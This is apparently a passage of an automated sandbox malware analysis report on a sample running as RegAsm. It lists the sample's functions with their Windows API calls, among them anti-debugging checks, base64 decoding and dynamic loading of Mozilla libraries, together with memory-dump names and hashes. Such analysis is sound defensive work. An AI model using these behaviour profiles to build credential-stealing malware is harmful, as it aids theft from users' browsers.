                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041E96A
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041E97F
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041E98A
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041E9A6
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041E9AD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                  • String ID: 8d
                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-1695097073
                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa8ae53db3ad8f3f305726abe46a993882e983b0c4a78402654160bf020c60c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1ab6a00abfa9653b80813f5f871d9f09f7cc8be42b21d6e5291d250c042eb096
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa8ae53db3ad8f3f305726abe46a993882e983b0c4a78402654160bf020c60c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD21E5BC910324DFE751DF15EC896847BB2FB0A319F50202AEA0887761E7765A81CF5D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C86545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C868A4B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                  • Instruction ID: 372a2a26612863b877cc438f36c279791e04c7df18dd699f2443012171478dae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAB1E772A0021ACFDB24CF69CDD07A9B7B2EF85314F1806B9C549DBB85D730A985CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C86542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8688F0
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C86925C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a4d86911fb2bd189793dcc3b4238fad058b9ae4a6c9cd823577ded9d0b253c3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B1C672E0120ACFCB24CF59C9816A9B7B2EF85314F150679C949DBB85D730A999CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8477A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C847A81
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C847A93
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: GetTickCount64.KERNEL32 ref: 6C815D40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: EnterCriticalSection.KERNEL32(6C87F688), ref: 6C815D67
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C847AA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: __aulldiv.LIBCMT ref: 6C815DB4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C815DED
                                                                                                                                                                                                                                                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C847B31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4054851604-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ec354bd931839d104a6a2e3b95be2c0e842cda3e493e812fffe72628d1d9dbca
                                                                                                                                                                                                                                                                                                  • Instruction ID: f4f16293831a3fdd5782465a1ad6ad91e2b95d5244383983685b33e50c162bcb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec354bd931839d104a6a2e3b95be2c0e842cda3e493e812fffe72628d1d9dbca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23B1B1316083988BDB24CF28C65065FB7E2BFC5318F158E2DE99567791D770E90ACB82
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406F50 Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4291131564-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 32aa950ce91f872d7702ce178019428f87853ac3d51013c830170eaf024b4fe2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801FF76344312BBF7204F95AC45F56B7ADEF45B61F201026FB49EB2C0D7B5A8108BA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040BEF0 Relevance: 93.4, APIs: 62, Instructions: 429memorystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BDFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: strchr.MSVCRT ref: 0040BE15
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750,?,75AA5460,00000000,?,?,?,?,?,?,?,00000000,00421101,000000FF), ref: 0040BF51
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00421101,000000FF,?,0040C750,?,00000000,?), ref: 0040BF58
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00421101,000000FF,?,0040C750,?,00000000), ref: 0040BF6D
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00421101,000000FF,?,0040C750,?,00000000,?), ref: 0040BF74
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040BF91
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040BFA2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00421101), ref: 0040BFA9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BFD3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040BFDA
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040BFE6
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040BFED
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C002
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C009
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C02C
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C03A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C041
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C060
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C067
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040C073
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C07A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C08F
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C096
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C0B9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C0C7
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C0CE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C0F6
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C0FD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040C109
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C110
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C125
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C12C
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C14C
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C15D
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C164
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040C16B
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C17D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C184
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040C1A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C1CB
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C1E2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C1E9
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040C1F0
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C1FF
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C206
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C214
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C21B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C237
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C243
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C24A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C277
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C27E
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040C28A
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C291
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C2A7
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2B6
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C2BD
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C331
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0040C341
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C3D0
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C3D7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3662779188-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9bdaf17dabfef0d877641bcfa9d40975454f3e3d93845ce835c1a6ce1cccb627
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d7be8f87f8b3fd3fa5a8793fbe88b2c50a844962f50f50fc8a48fd6101b6914
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bdaf17dabfef0d877641bcfa9d40975454f3e3d93845ce835c1a6ce1cccb627
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE14676900225EBDB10EBE0DD89EAFBB7DEF45304F00552AFA01B3291DB785905CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8555F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(user32,?,6C82E1A5), ref: 6C855606
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C82E1A5), ref: 6C85560F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C855633
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C85563D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C85566C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C85567D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C855696
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C8556B2
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C8556CB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C8556E4
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C8556FD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C855716
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C85572F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C855748
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C855761
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C85577A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C855793
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C8557A8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C8557BD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C8557D5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C8557EA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C8557FF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7de9f934ec18aaa3146e5f6940cc9bf23cc6af654f21b2b55bf3c6887b540a69
                                                                                                                                                                                                                                                                                                  • Instruction ID: fdb433e7effeefcd3de549827b7a7938c891278e7d73b8b8984880aafc923634
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7de9f934ec18aaa3146e5f6940cc9bf23cc6af654f21b2b55bf3c6887b540a69
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F513D716117225B9B329F368E4C92F3AB9AB1728D7504C35E911E2B41FBB0D810DBB0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C80582D), ref: 6C83CC27
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C80582D), ref: 6C83CC3D
